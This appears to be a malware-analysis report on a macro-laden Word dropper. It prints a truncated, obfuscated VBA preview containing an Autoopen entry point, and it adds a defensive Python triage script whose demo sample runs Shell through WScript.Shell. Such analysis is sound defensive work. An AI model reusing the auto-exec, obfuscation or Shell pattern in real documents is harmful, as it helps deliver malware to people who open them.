Verdict: MALICIOUS
Risk Score: 202
Malware Insights
MITRE ATT&CK
T1059.005 Command and Scripting Interpreter: Visual Basic
T1204.002 User Execution: Malicious File
The sample is a malicious Word document carrying VBA macros, including an AutoOpen procedure (spelled `Autoopen` in the recovered source; VBA identifiers are case-insensitive, so it still runs when the document is opened) and a Shell() call. ClamAV identifies it as Doc.Dropper.Agent-6520158-0, that is, a dropper. The recovered VBA is heavily obfuscated: the preview consists almost entirely of Select Case blocks that switch on variables never assigned anywhere in the visible code, so no Case arm can match and the blocks are dead padding that hides the live logic. The Autoopen procedure runs under On Error Resume Next, which suppresses runtime errors, and contains a single live statement, a call to oUlwzfh whose body lies beyond the truncated preview. The Shell() call reported by the heuristics indicates intent to execute an external command, most likely to launch a second-stage payload; the preview does not show the command string, so the payload and its delivery channel are not established by this report.
Heuristics (6)
- ClamAV: Doc.Dropper.Agent-6520158-0 [critical, CLAMAV_DETECTION]: ClamAV detected this file as malware: Doc.Dropper.Agent-6520158-0.
- VBA macros detected [medium, OLE_VBA_MACROS, 2 related findings]: Document contains VBA macro code.
- Shell() call in VBA [critical, OLE_VBA_SHELL]: Shell() call in VBA.
- AutoOpen macro [high, OLE_VBA_AUTOOPEN]: AutoOpen macro.
- Legacy WordBasic auto-exec macro marker [medium, OLE_LEGACY_WORDBASIC_AUTOEXEC]: OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself. Note that this generic description does not fit this sample: a VBA project was recovered (macros.bas below), so the finding duplicates the AutoOpen detection rather than adding an independent execution surface.
- Embedded URL [info, EMBEDDED_URL]: One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://schemas.openxmlformats.org/drawingml/2006/main, found in document text (OLE body). This is the DrawingML XML namespace URI that Office writes into embedded drawing and chart parts; it is not a download or command-and-control address.
Extracted artifacts (1)
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 52132 bytes | 17a24c0d3297022b89664ca1f41879e192b048d56e4cbec10d51eb4508ea7f44 |

Preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "sWLpKFSYwjVtsG"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub MINns(lNZQjH)
Select Case VQZNNu
Case 84311
fEGTd = wUzhZ
kzwEl = Round(6960)
kfSpj = Hex(pTdwkz - ChrW(wthEH))
OSmtZ = GkGXTU
Case 54055
sHfMO = CByte(44016)
otVYP = Log(WarQrz)
End Select
End Sub
Sub oiwmt(dKjvJ)
Select Case HmJpNV
Case 81377
vaYRUJ = jKOHcX
VKJtT = Round(13180)
OEzLzH = Hex(NkivBN - ChrW(OJjRj))
tAVoh = wRzjU
Case 3704
qhVbFX = CByte(3835)
WZkMbJ = Log(GAcbjw)
End Select
Select Case OjJit
Case 21678
NEKtRX = siathK
alcGu = Round(12940)
zDsRm = Hex(TmRbiq - ChrW(IUaSJ))
BORBhC = cnwhYw
Case 8745
OARbf = CByte(63440)
FRzPq = Log(OGLJwI)
End Select
Select Case wiBLP
Case 99984
jokCj = zuUIrd
jIzCS = Round(23527)
OjnXbp = Hex(YfwGMf - ChrW(oRhwj))
tTlCS = DXoiz
Case 86120
EwzBM = CByte(52283)
mYOVCf = Log(lsqSFj)
End Select
End Sub
Sub BuvkF(mbkzz)
Select Case JaUpP
Case 40458
sRVFQ = nURfzQ
JvDEEQ = Round(12922)
EKnRW = Hex(VXQCbz - ChrW(qqjpik))
nUvnh = DOXQl
Case 98210
CoHhn = CByte(88973)
RwBdW = Log(KSFXO)
End Select
Select Case joijO
Case 1016
RlHAzR = ijCjzB
ZBrSSR = Round(27464)
lJACLS = Hex(YEsjDc - ChrW(JvBLu))
iQVYMp = mnRvj
Case 41950
AwAzF = CByte(17588)
IwqSw = Log(zrvRH)
End Select
End Sub
Sub Autoopen()
On Error Resume Next
Select Case iPUnb
Case 80672
Mnknw = hFZKvE
lbVSf = Round(10963)
hGvsz = Hex(MrHfLY - ChrW(iwVXK))
UQCajA = AmDuC
Case 15498
boFss = CByte(75764)
lqzuz = Log(zXoFz)
End Select
oUlwzfh (kkwfj + IMuivVnnFOB + rmoao)
Select Case dDCfu
Case 82452
fXnjZE = hiPdzz
uXldJZ = Round(57686)
ASLCk = Hex(wTRdz - ChrW(SjzAYb))
jNWLcq = ifRCl
Case 32898
iXUYXT = CByte(30051)
KwAAVi = Log(akEhZ)
End Select
End Sub
Sub ndHiLU(QCOrjc)
Select Case MccAHk
Case 90787
YLcUm = FjzDr
qtMqL = Round(98599)
VIjIUt = Hex(wzIDZp - ChrW(lFwGr))
KKWRop = zTQmpI
Case 5434
uoCHav = CByte(48022)
YtdBA = Log(nPjUR)
End Select
Select Case KlSTi
Case 37078
ihWORn = qRtwQm
CzXKna = Round(85292)
ACUrjP = Hex(VjdHD - ChrW(aCiMOX))
WWkEi = HovIrt
Case 375
hTtaGM = CByte(65453)
KVIirc = Log(swZCdI)
End Select
Select Case SQMwIU
Case 50447
lODutj = lHLjbL
vvsis = Round(5257)
RqWrD = Hex(dNKEN - ChrW(kjtfz))
MHMRqz = SDVQDd
Case 54537
QUXjD = CByte(80358)
HYzHTG = Log(iBQuvf)
End Select
End Sub
Sub zzzZJk(HwGalz)
Select Case PWzut
Case 57910
oUjdbr = UAIhw
TUYHtF = Round(72228)
bqjiI = Hex(PfRAB - ChrW(vIfPv))
sYnwzs = VAuzrA
Case 77938
zMdDvS = CByte(70754)
ojIjv = Log(KpILKM)
End Select
End Sub
Attribute VB_Name = "MfsntmFVh"
Sub zNIvw(MzQIP)
Select Case MpMtoq
Case 8894
jqcfnj = QBjinH
ITmkO = Round(77957)
LuEwNT = Hex(aAwPQ - ChrW(tJkdIP))
vzkdb = ChtGDc
Case
... (truncated)
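The preview above is what an analyst gets back from olevba: thousands of lines of padding with a few live statements buried in it. The following script is an added example, not the analyzer's code or the sample's, that performs the triage the summary describes on extracted VBA text: it finds auto-exec entry points (treating names case-insensitively, as VBA does), walks the call graph from them so padding procedures that nothing reaches stand out, flags suspicious identifiers such as Shell and CreateObject, and counts Select Case blocks whose selector is never assigned. `SAMPLE` is a constructed miniature that copies the shape of the preview (the MINns padding and the Autoopen body follow the report); the bodies of `oUlwzfh` and `stage2` are invented for the demo, because the report truncates before the real ones, and the `SUSPICIOUS` table is my own short list, not olevba's.

```python
import re
from collections import deque

# Procedures Word/Excel run without user interaction (subset).
AUTO_EXEC = {"autoopen", "autoexec", "autoclose", "autoexit", "autonew",
             "document_open", "document_close", "workbook_open", "workbook_close"}
# Identifiers worth flagging, loosely after olevba's suspicious-keyword list (assumed list).
SUSPICIOUS = {"shell": "runs an external command",
              "createobject": "instantiates a COM object (WScript.Shell, XMLHTTP, ...)",
              "getobject": "attaches to a running COM object",
              "environ": "reads environment variables",
              "urldownloadtofile": "downloads a file via urlmon"}

SUB_RE = re.compile(r"^\s*(?:Public\s+|Private\s+)?(?:Sub|Function)\s+(\w+)\s*\(([^)]*)\)", re.I)
END_RE = re.compile(r"^\s*End\s+(?:Sub|Function)\b", re.I)
ASSIGN_RE = re.compile(r"^\s*(?:Set\s+)?(\w+)\s*=", re.I)
SELECT_RE = re.compile(r"^\s*Select\s+Case\s+(\w+)\s*$", re.I)
IDENT_RE = re.compile(r"[A-Za-z_]\w*")


def parse_subs(src):
    """Map lowercase procedure name -> (parameter names, body lines).
    VBA is case-insensitive: Autoopen and AutoOpen are the same entry point."""
    subs, cur = {}, None
    for line in src.splitlines():
        m = SUB_RE.match(line)
        if m:
            cur = m.group(1).lower()
            subs[cur] = ({p.lower() for p in IDENT_RE.findall(m.group(2))}, [])
        elif END_RE.match(line):
            cur = None
        elif cur is not None:
            subs[cur][1].append(line)
    return subs


def _idents(lines):
    return {t.lower() for line in lines for t in IDENT_RE.findall(line)}


def reachable_from_autoexec(subs):
    """Breadth-first walk of the call graph, starting at auto-exec procedures."""
    roots = [n for n in subs if n in AUTO_EXEC]
    seen, queue = set(roots), deque(roots)
    while queue:
        for callee in _idents(subs[queue.popleft()][1]) & set(subs):
            if callee not in seen:
                seen.add(callee)
                queue.append(callee)
    return roots, seen


def suspicious_calls(subs):
    """(procedure, keyword, description) for every flagged identifier in a body."""
    hits = []
    for name, (_, body) in subs.items():
        used = _idents(body)
        hits += [(name, kw, why) for kw, why in SUSPICIOUS.items() if kw in used]
    return hits


def junk_select_blocks(src, subs):
    """Count Select Case blocks whose selector is never assigned and is not a
    parameter: without Option Explicit it stays an Empty Variant, no non-zero
    numeric Case ever matches, and the block is dead padding. Heuristic only."""
    lines = src.splitlines()
    assigned = {m.group(1).lower() for m in map(ASSIGN_RE.match, lines) if m}
    params = set().union(*(p for p, _ in subs.values()))
    selectors = [m.group(1).lower() for m in map(SELECT_RE.match, lines) if m]
    junk = sum(1 for s in selectors if s not in assigned and s not in params)
    return junk, len(selectors)


def triage(src):
    subs = parse_subs(src)
    roots, reachable = reachable_from_autoexec(subs)
    return {"auto_exec": roots,
            "reachable": sorted(reachable),
            "unreachable": sorted(set(subs) - reachable),
            "suspicious": suspicious_calls(subs),
            "junk_select_blocks": junk_select_blocks(src, subs)}


# Constructed input mirroring the preview's shape. MINns and the Autoopen body
# follow the report; the bodies of oUlwzfh and stage2 are invented for the demo.
SAMPLE = """Attribute VB_Name = "sWLpKFSYwjVtsG"
Sub MINns(lNZQjH)
Select Case VQZNNu
Case 84311
fEGTd = wUzhZ
kzwEl = Round(6960)
Case 54055
sHfMO = CByte(44016)
End Select
End Sub
Sub Autoopen()
On Error Resume Next
Select Case iPUnb
Case 80672
Mnknw = hFZKvE
End Select
oUlwzfh (kkwfj + IMuivVnnFOB + rmoao)
End Sub
Sub oUlwzfh(arg)
Select Case dDCfu
Case 82452
fXnjZE = hiPdzz
End Select
stage2 arg
End Sub
Sub stage2(cmdline)
Set wsh = CreateObject("WScript.Shell")
Shell cmdline, 0
End Sub
"""

if __name__ == "__main__":
    for key, value in triage(SAMPLE).items():
        print(f"{key}: {value}")
```

Run it against the real macros.bas by reading the file into `triage()`: the reachable set tells you which of the dozens of padding procedures actually sit on the path from Autoopen to the Shell() call, and the junk ratio gives a quick, quotable measure of how much of the 52 KB is inert. The call-graph walk is by identifier reference, so it also catches calls made through `Call`, `Application.Run` with a literal name, or bare-name statements; calls built from string concatenation at runtime will be missed, which is exactly the case that warrants dynamic analysis.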